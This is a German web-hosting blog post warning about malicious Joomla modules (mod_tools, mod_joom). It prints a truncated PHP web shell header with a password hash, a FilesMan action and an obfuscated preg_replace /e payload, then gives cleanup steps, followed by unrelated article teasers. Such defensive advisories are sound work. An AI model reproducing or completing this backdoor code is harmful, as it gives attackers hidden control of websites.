Joomla Hack Security

Wieder tauchen auf einigen unserer Kundenaccounts fremde Dateien auf. Aktuell handelt es sich um Module die in Joomla 2.5 installiert wurden. mod_tools und mod_joom können also gefährliche Inhalte haben!!!

Liste der Hacker-Dateien

~/modules/mod_tools/mod_tools.php
~/modules/mod_joom/mod_joom.php

Inhalt der mod_tools.php

<?php #
$auth_pass = "549f1673cebe855799612017b0242e4386";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e",ippq(...)Kn6fwE='\x29\x29\x29\x3B",".");?>

Im Backend erscheinen unter Module auch unbekannte Einträge wie "System", "System1" und "Tools". Diese sollten schnellstmöglich deaktiviert werden. Danach via FTP prüfen ob die Ordner "mod_tools" und "mod_joom" aus dem Verzeichnis "modules" gelöscht wurden.

Häufig werden im Stammverzeichnis php-Dateien gefunden. Wenn außer der "index.php" und der "configuration.php" noch weitere PHP-Dateien zu finden sind sollten diese geprüft werden. Es handelt sich dann nicht um Joomla-Corde Dateien.

Bei anderen Beiträgen haben wir bereits Tipps für sichere Joomla Webseiten gegeben. Neben dem Joomla hmei7 Hack haben wir auch Hinweise für die Beseitigung des Joomla base64 Hacks gegeben. Wenn Sie diese Hinweise beachten sollte Ihre Webseite sicher sein.

Widerrufbutton im Onlineshop

Widerrufbutton im Onlineshop

Bei allen B2C Fernabsatzverträgen muss es ab Spätestens ab dem 19. Juni 2026 möglich sein den geschlossenen Vertrag genauso einfach zu widerrufen wie abzuschließen. Was muss ich umbauen? Wie sieht eine Lösung für...

Read more

wasapi modus ausschalten

Um den WASAPI-Exklusivmodus in Windows zu deaktivieren, öffnen Sie über mmsys.cpl (Win+R) die Soundeinstellungen, wählen das Wiedergabegerät aus und entfernen unter „Eigenschaften“ > „Erweitert“ die Haken bei „Anwendungen haben alleinige...

Read more

JCE Fileupload maximum 1024kb

JCE Fileupload maximum 1024kb

Der JCE lässt nur Dateien bis 1024KB ( 1 MB ) zu

Read more

Joomla OSmap Update führt zu Fatal Error…

Joomla OSmap Updates

Die aktuellen Updates von OSMap Free verursachen Fehler bei einem Update.  Problem ist die Erweiterung "ShackExtensionSupport" darin befindet sich die Datei "AbstractScript.php"

Read more

Matomo Cronjob bei ALLinkl einrichten

Matomo (früher Piwik) ist ein Open-Source-Webanalyse-Tool, das ähnlich wie Google Analytics funktioniert, aber mit starkem Fokus auf Datenschutz, Datenhoheit und DSGVO-Konformität.Es kann entweder selbst gehostet (On-Premise) oder als Cloud-Lösung genutzt...

Read more

Unclosed regex pattern at position

Joomshaper Compress JS

Ein unschöner Fehler tritt im Zusammenspiel vom JoomShaper Template „shaper_helixultimate“ und dem Video Plugin „AllVideos (by JoomlaWorks)“ auf.

Read more

Joomla & WordPress-Website lokal/off…

Website lokal speichern mit HTTrack

Ein statisches Backup (HTML Seiten) einer dynamischen Webseite auf CMS Basis (PHP MySQL) wie Wordpress oder Joomla macht sich am besten mit HTTrack. Wir nutzen das Tool gern um einzelne Seiten...

Read more

HTTrack Empty Mirror Error

HTTrack Empty Mirror Error

Wir nutzen den guten alten „WinHTTrack Website Copier“ gern um eine statische Kopie einer Joomla oder Wordpress-Webseite zu erstellen und abzulegen. Das ist vor allem bei Maintenance oder Baustellenseiten eine...

Read more

REST-API : Datenbankmigrationen mit Alem…

Im Zuge der Entwicklung einer REST API mit Python, kommen wir jetzt zu Datenbankmigrationen mit Alembic. Migrationen sind extrem wichtig, wenn du deine Datenbankstruktur im Laufe der Entwicklung ändern willst (z...

Read more